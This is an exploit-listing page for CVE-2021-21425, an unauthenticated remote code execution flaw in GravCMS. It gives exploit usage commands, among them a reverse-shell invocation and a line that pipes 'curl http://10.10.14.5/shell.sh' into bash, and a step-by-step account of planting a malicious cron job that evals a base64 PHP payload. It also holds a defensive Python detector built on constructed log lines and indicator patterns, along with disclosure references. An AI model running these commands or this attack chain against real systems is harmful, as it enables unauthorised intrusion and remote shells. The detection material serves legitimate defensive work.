## https://sploitus.com/exploit?id=1B1A3142-CD90-5BA0-A772-AC630842FD7C
# CVE-2021-21425 - GravCMS Unauthenticated RCE
Unauthenticated Remote Code Execution exploit for GravCMS
```bash
# Custom command
python3 exploit.py -t http://target -c "id"
```
### Examples
```bash
# Get reverse shell on target
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444
# Execute command
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"
```
## Requirements
```bash
pip install requests
```
## How It Works
1. Fetches `/admin` to extract the `admin-nonce` token (no authentication is required because of the vulnerability)
2. Sends a POST to `/admin/config/scheduler` containing a malicious cron job configuration
3. The Grav scheduler executes the PHP payload via `/usr/bin/php -r eval(base64_decode(...))`
4. The PHP code writes the base64-decoded reverse shell to `/tmp/rev.sh` and executes it
The cron job runs every minute (`* * * * *`), so the shell arrives within 60 seconds.
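From the defender's side, the steps above leave two artefacts worth checking: a POST to the scheduler configuration endpoint in the web server access log, and a custom job in the Grav scheduler configuration that invokes `php -r` with a base64-encoded payload on a `* * * * *` schedule. The following script is an added example written for this page, not part of the exploit or of Grav itself; the log lines and the job entries are constructed, and the job dictionary layout (`command`, `args`, `at` per job) is an assumption about how a parsed scheduler config would look, as is the default `/admin` route.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample access-log lines (combined log format); not from a real host.
SAMPLE_LOG = """\
10.0.0.7 - - [29/Mar/2021:10:01:02 +0000] "GET /admin HTTP/1.1" 200 5120 "-" "python-requests/2.25.1"
10.0.0.7 - - [29/Mar/2021:10:01:03 +0000] "POST /admin/config/scheduler HTTP/1.1" 302 0 "-" "python-requests/2.25.1"
10.0.0.9 - admin [29/Mar/2021:10:05:00 +0000] "POST /admin/config/scheduler HTTP/1.1" 302 0 "http://grav.local/admin/config/scheduler" "Mozilla/5.0"
10.0.0.9 - - [29/Mar/2021:10:06:00 +0000] "GET /blog HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Constructed scheduler jobs in an assumed parsed-YAML shape; the payload is a placeholder.
SAMPLE_JOBS = {
    "cache-clear": {"command": "bin/grav", "args": "clearcache", "at": "0 3 * * *"},
    "x9f2": {
        "command": "/usr/bin/php",
        "args": '-r eval(base64_decode("BASE64_PLACEHOLDER"));',
        "at": "* * * * *",
    },
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumes the default admin route; adjust if the site renamed /admin.
SCHEDULER_ENDPOINT = "/admin/config/scheduler"

# (substring to look for in the job command line, reason reported)
JOB_INDICATORS = (
    ("php -r", "php -r inline code execution"),
    ("base64_decode", "base64-encoded payload"),
    ("eval(", "eval of dynamic code"),
    ("/tmp/", "writes to or runs from /tmp"),
)


def scheduler_config_posts(log_lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return every POST to the scheduler config endpoint.

    Each hit should match a legitimate admin session; anything else
    (scripted user agent, no referer, unexpected source IP) warrants review.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0].rstrip("/")
        if m["method"] == "POST" and path == SCHEDULER_ENDPOINT:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                         "referer": m["referer"], "ua": m["ua"]})
    return hits


def suspicious_jobs(custom_jobs: Dict[str, Dict[str, str]]) -> Dict[str, List[str]]:
    """Map job name -> reasons for any scheduler job that looks like the payload above."""
    findings: Dict[str, List[str]] = {}
    for name, job in custom_jobs.items():
        cmdline = f"{job.get('command', '')} {job.get('args', '')}"
        reasons = [why for needle, why in JOB_INDICATORS if needle in cmdline]
        if job.get("at", "").strip() == "* * * * *":
            reasons.append("runs every minute")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for hit in scheduler_config_posts(SAMPLE_LOG.splitlines()):
        print("scheduler config POST:", hit)
    for name, reasons in suspicious_jobs(SAMPLE_JOBS).items():
        print(f"suspicious job {name!r}: {', '.join(reasons)}")
```

On a real host, feed `scheduler_config_posts` the web server's access log and `suspicious_jobs` the `custom_jobs` mapping from the site's scheduler configuration after parsing it with a YAML library; the every-minute schedule on its own is not malicious, so it is reported as one reason among several rather than as a verdict.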
## Timeline
- **2021-03-29** - Disclosed by Mehmet Ince
- **2021-04-01** - Patched in Grav Admin Plugin
## References
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2021-21425)
- [GitHub Advisory](https://github.com/getgrav/grav-plugin-admin/security/advisories/GHSA-wg37-cf5x-55hq)
- [ExploitDB](https://www.exploit-db.com/exploits/49973)
- [Pentest Blog - Mehmet Ince](https://pentest.blog/)
## Disclaimer
For authorized security testing only. Ensure you have written permission before testing against any system.